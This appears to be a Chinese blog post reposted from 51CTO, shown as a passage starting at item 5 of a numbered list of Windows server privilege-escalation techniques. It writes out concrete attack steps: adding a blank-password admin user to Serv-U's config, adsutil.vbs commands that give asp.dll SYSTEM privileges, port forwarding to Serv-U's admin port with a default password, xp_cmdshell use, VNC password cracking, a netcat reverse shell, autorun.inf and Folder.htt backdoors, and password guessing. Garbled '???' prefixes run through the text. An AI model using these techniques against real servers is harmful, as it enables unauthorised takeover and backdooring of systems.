??? C：\Documents and Settings\All Users\「開始」菜單\程序\

??? 引用：Serv-U，然后本地查看屬性，知道路徑后，看能否跳轉

??? 進去后，如果有權限修改ServUDaemon.ini，加個用戶上去，密碼為空

??? [USER=WekweN|1] Password= HomeDir=c：\ TimeOut=600 Maintenance=System Access1=C：\|RWAMELCDP Access1=d：\|RWAMELCDP Access1=f：\|RWAMELCDP SKEYValues=

??? 這個用戶具有最高權限，然后我們就可以ftp上去 quote site exec xxx 來提升權限

??? 5.c：\winnt\system32\inetsrv\data\

??? 引用：就是這個目錄，同樣是erveryone 完全控制，我們所要做的就是把提升權限的工具上傳上去，然后執行

??? 6.SU溢出提權

??? 這個網上教程N多 不詳細講解了

??? 7.運行Csript

??? 引用：運行"cscript C：\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權限

??? 用這個cscript C：\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

??? 查看有特權的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

??? 再將asp.dll加入特權一族

??? asp.dll是放在c：\winnt\system32\inetsrv\asp.dll （不同的機子放的位置不一定一樣）

??? 我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C：\WINNT\system32\idq.dll" "C：\WINNT\system32\inetsrv\httpext.dll" "C：\WINNT\system32\inetsrv\httpodbc.dll" "C：\WINNT\system32\inetsrv\ssinc.dll" "C：\WINNT\system32\msw3prt.dll""c：\winnt\system32\inetsrv\asp.dll"

??? 可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了

??? 8.腳本提權

??? c：\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat，vbs

??? 9.VNC

??? 這個是小花的文章 HOHO

??? 默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password

??? 我們可以用vncx4

??? 破解它，vncx4使用很簡單，只要在命令行下輸入

??? c：\>vncx4 -W

??? 然后順序輸入上面的每一個十六進制數據，沒輸完一個回車一次就行了。

??? 10.NC提權

??? 給對方來個NC 但是條件是你要有足夠的運行權限 然后把它反彈到自己的電腦上 HOHO OK了

??? 11.社會工程學之GUEST提權

??? 很簡單 查看他的擁護 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵箱號?手機號?盡量看看 HOHO

??? 12.IPC空連接

??? 如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令

??? 13.替換服務

??? 這個不用說了吧？個人感覺相當復雜

??? 14.autorun .inf

??? autorun=xxx.exe 這個=后面自己寫 HOHO 加上只讀、系統、隱藏屬性 傳到哪個盤都可以的 不相信他不運行

??? 15.desktop.ini與Folder.htt

??? 引用：首先，我們現在本地建立一個文件夾，名字不重要，進入它，在空白處點右鍵，選擇“自定義文件夾”（xp好像是不行的）一直下點，默認即可。完成后，你就會看到在此目錄下多了兩個名為Folder setting的文件架與desktop.ini的文件，（如果你看不到，先取消“隱藏受保護的操作系統文件”）然后我們在Folder setting目錄下找到Folder.htt文件，記事本打開，在任意地方加入以下代碼：然后你將你的后門文件放在Folder setting目錄下，把此目錄與desktop.ini一起上傳到對方任意一個目錄下，就可以了，只要等管理員瀏覽了此目錄，它就執行了我們的后門

??? 16.su覆蓋提權

??? 本地安裝個su，將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉，重起一下Serv-U，于是你上面的所有配置都與他的一模一樣了

??? 17.SU轉發端口

??? 43958這個是 Serv -U 的本地管理端口。FPIPE.exe上傳他，執行命令： Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是將3333端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u，新建一個服務器，IP填對方IP，帳號為LocalAdministrator 密碼為$ak#.1k；#1@$ak#.1k'>0@p">#1@$ak#.1k；0@p?連接上后你就可以管理他的Serv-u了

??? 18.SQL帳戶密碼泄露

??? 如果對方開了MSSQL服務器，我們就可以通過用SQL連接器加管理員帳號（可以從他的連接數據庫的ASP文件中看到），因為MSSQL是默認的SYSTEM權限。

??? 引用：對方沒有刪除xp_cmdshell 方法：使用Sqlexec.exe，在host 一欄中填入對方IP，User與Pass中填入你所得到的用戶名與密碼。format選擇xp_cmdshell“%s”即可。然后點擊connect，連接上后就可以在CMD一欄中輸入你想要的CMD命令了

??? 19.asp.dll

??? 引用：因為asp.dll是放在c：\winnt\system32\inetsrv\asp.dll （不同的機子放的位置不一定相同）

??? 我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C：\WINNT\system32\idq.dll" "C：\WINNT\system32\inetsrv\httpext.dll" "C：\WINNT\system32\inetsrv\httpodbc.dll" "C：\WINNT\system32\inetsrv\ssinc.dll" "C：\WINNT\system32\msw3prt.dll""c：\winnt\system32\inetsrv\asp.dll"

??? 好了，現在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去

??? 了，注意，用法中的get和set，一個是查看一個是設置。還有就是你運行上面的你要到C：\Inetpub\AdminScripts>這個目錄下。

??? 那么如果你是一個管理員，你的機子被人用這招把asp提升為system權限，那么，這時，防的方法就是把asp.dll T出特權一族，也就是用set這個命令，覆蓋掉剛才的那些東東。

??? 20.Magic Winmail

??? 前提是你要有個webshell 引用：[url]http://www.eviloctal.com/forum/read.php[/url]？tid=3587這里去看吧

??? 21.DBO……

??? 其實 提升權限的方式很多的 就看大家怎么利用了 HOHO 加油吧 將服務器控制到底

本文轉自starger51CTO博客，原文鏈接：http://blog.51cto.com/starger/17253?，如需轉載請自行聯系原作者